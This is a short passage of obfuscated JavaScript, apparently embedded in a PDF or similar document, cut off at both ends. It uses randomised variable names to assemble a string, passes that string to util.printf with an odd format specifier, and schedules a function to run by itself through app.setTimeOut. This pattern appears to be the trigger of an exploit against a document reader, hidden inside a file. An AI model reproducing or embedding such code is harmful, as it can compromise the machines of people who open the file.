MrJkwbBGfT += "8";          }          var oHtozEbiFZ = util;          oHtozEbiFZ["printf"]("E000f", MrJkwbBGfT);        }      }    } } ")); 
 app.mKR75NhGeM = n2y0s6dg5X;
 n24PhaL94i = app.setTimeOut("app.mKR75NhGeM()", 1);